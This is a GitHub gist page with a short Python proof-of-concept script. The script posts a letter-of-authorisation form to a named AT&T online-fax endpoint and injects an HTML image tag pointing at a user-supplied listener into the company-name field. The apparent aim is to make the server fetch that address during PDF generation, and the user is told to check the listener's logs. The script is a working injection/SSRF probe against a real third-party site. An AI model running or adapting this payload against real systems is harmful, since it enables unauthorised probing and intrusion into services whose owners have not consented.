Created
October 12, 2019 11:48
-
-
Save andripwn/3559e5637604f4b1028d39275789ef93 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
url = "https://onlinefaxtwo.att.com/loa.php" | |
listener = input('Listener address. default port [80]: ') | |
headers = {'Content-type': 'application/x-www-form-urlencoded'} | |
data = {'uCompanyName': '<img src="http://' + listener + '">', | |
'uPersonAuth':'asas', | |
'uServProvider':'asas', | |
'uServAddress':'asa', | |
'uCity':'daniel', | |
'uState':'NY', | |
'uZip':'11100', | |
'uPortNum':'9739018822', | |
'uBTN':'1212121212', | |
'cQlc':'on', | |
'cQit':'on', | |
'cQic':'on', | |
'getLOApdf':''} | |
print("Request should be sent within 10 seconds") | |
r = requests.post(url, data=data, headers=headers, timeout=10) | |
print("Check your server LOGS :)") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment